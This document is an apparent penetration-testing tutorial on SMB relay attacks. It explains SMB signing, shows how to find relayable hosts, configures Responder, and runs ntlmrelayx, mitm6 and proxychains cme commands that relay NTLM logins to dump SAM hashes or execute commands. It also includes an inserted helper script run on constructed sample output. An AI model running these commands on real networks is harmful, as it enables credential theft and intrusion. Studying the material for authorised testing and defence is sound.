SMB Relay
What is SMB relay?
An SMB relay attack takes the NTLM authentication you would otherwise capture with Responder (as in LLMNR poisoning) and, instead of cracking the hash offline, forwards it live to another machine so that you authenticate there as the victim user.
Requirements
SMB signing must be disabled or not required on the target. Workstations and member servers have it enabled but not required by default; domain controllers require it by default and cannot be relayed to.
The relayed user must have administrative rights on the target (local administrator, or membership in a domain group such as Domain Admins that is local admin there). Otherwise the relay still authenticates but cannot dump the SAM or execute commands. The target also cannot be the machine the authentication came from: relaying back to the origin host has been blocked since MS08-068.
What is SMB Signing?
SMB signing adds a MAC to every SMB packet so the receiver can verify the packet's origin and integrity. The signing key is derived from the user's password hash, which the attacker does not have, so a relayed session fails as soon as signing is required. It effectively prevents SMB MitM and relay attacks.
Check SMB Signing
CrackMapExec and Nmap can both scan an entire network for the SMB signing setting, which makes picking relay targets much easier.
Crackmapexec
Run it against a host or range; the output shows signing:True or signing:False for every host that answers on 445:
crackmapexec smb <ip-address>
Nmap
Nmap has a script that reports whether SMB signing is enabled and whether it is required. A result of "Message signing enabled but not required" means the host can be relayed to:
nmap --script=smb2-security-mode.nse -p 445,139 192.168.64.129 -Pn --open
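As an added example (not code from the original page), the following shell function turns the signing column of crackmapexec output into a target file that ntlmrelayx can consume with -tf instead of a single -t host. The three crackmapexec lines are constructed sample output, and the IP addresses and the targets.txt path in the usage comment are assumptions.

```shell
#!/usr/bin/env bash
# Added example (not from the original page): turn the signing column of
# crackmapexec output into a target list for ntlmrelayx -tf. The three lines
# below are constructed sample output shaped like `crackmapexec smb <range>`.
CME_OUTPUT='SMB         192.168.64.129  445    DC01    [*] Windows Server 2019 Build 17763 x64 (name:DC01) (domain:corp.local) (signing:True) (SMBv1:False)
SMB         192.168.64.130  445    WS01    [*] Windows 10.0 Build 19041 x64 (name:WS01) (domain:corp.local) (signing:False) (SMBv1:True)
SMB         192.168.64.131  445    WS02    [*] Windows 10.0 Build 19041 x64 (name:WS02) (domain:corp.local) (signing:False) (SMBv1:False)'

# relay_targets [EXCLUDE_IP]
# Prints one IP per line for every host reporting signing:False. The optional
# EXCLUDE_IP is skipped: use it for the attacker box, or for a host you know
# will be the source of the captured authentication, since NTLM cannot be
# relayed back to the machine it originated from.
relay_targets() {
    local exclude="${1:-}"
    printf '%s\n' "$CME_OUTPUT" \
      | awk -v skip="$exclude" '
          $1 == "SMB" && index($0, "(signing:False)") > 0 && $2 != skip { print $2 }'
}

# Usage (hypothetical paths/addresses): write the list and hand it to ntlmrelayx.
# relay_targets 192.168.64.10 > targets.txt
# sudo ntlmrelayx.py -tf targets.txt -smb2support
```

The DC (signing:True) is dropped and the two workstations are kept. CrackMapExec can produce the same file directly with `crackmapexec smb <range> --gen-relay-list targets.txt`; the function above is useful when you only have saved scan output.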
How to perform the attack (IPv4)
First, configure Responder (Responder.conf) so that its own SMB and HTTP servers are turned off:
[Responder Core]
; Servers to start
SQL = On
SMB = Off
RDP = On
Kerberos = On
FTP = On
POP = On
SMTP = On
IMAP = On
HTTP = Off
HTTPS = On
DNS = On
LDAP = On
DCERPC = On
WINRM = On
Responder keeps poisoning LLMNR/NBT-NS/mDNS so that victims still connect to our machine, but with its SMB and HTTP servers off those connections reach ntlmrelayx.py from Impacket, which listens on 445 and 80 and relays the authentication to the target instead of just capturing the hash. If Responder's servers stayed on, they would grab port 445/80 first and ntlmrelayx would never see the authentication.
Starting responder
sudo python Responder.py -I eth0 -v
Then, in a second terminal, start ntlmrelayx.py pointed at a target where signing is not required:
sudo python ntlmrelayx.py -t 192.168.1.11 -smb2support
With no other options, ntlmrelayx dumps the target's local SAM once a user who is a local administrator there is relayed. Use -tf <file> to supply a list of targets instead of a single -t host, and -c '<command>' to run a command on the target instead of dumping the SAM. Nothing happens until a victim authenticates (for example by resolving a mistyped share name through LLMNR), so the attack depends on the user activity on the network.
SMB Relay using IPv6
mitm6 answers DHCPv6 requests and becomes the victims' DNS server, so their WPAD and SMB traffic reaches ntlmrelayx over IPv6. Run mitm6 in one terminal and ntlmrelayx in another:
mitm6 -d domain-name.local
# -6 listens on IPv6; -wh is the attacker's own address (the host serving the WPAD file), not the target; -socks keeps every relayed session open as a SOCKS proxy instead of acting on it once.
ntlmrelayx.py -6 -wh <attacker-ip> -t smb://<target-ip> -socks -debug -smb2support
# Once ntlmrelayx lists a relayed session with AdminStatus TRUE, use it through proxychains. The password is ignored because the SOCKS session is already authenticated.
proxychains cme smb <target-ip> -u <User> -p 'whateveryouwant' -d 'domaincorp' --sam 2>/dev/null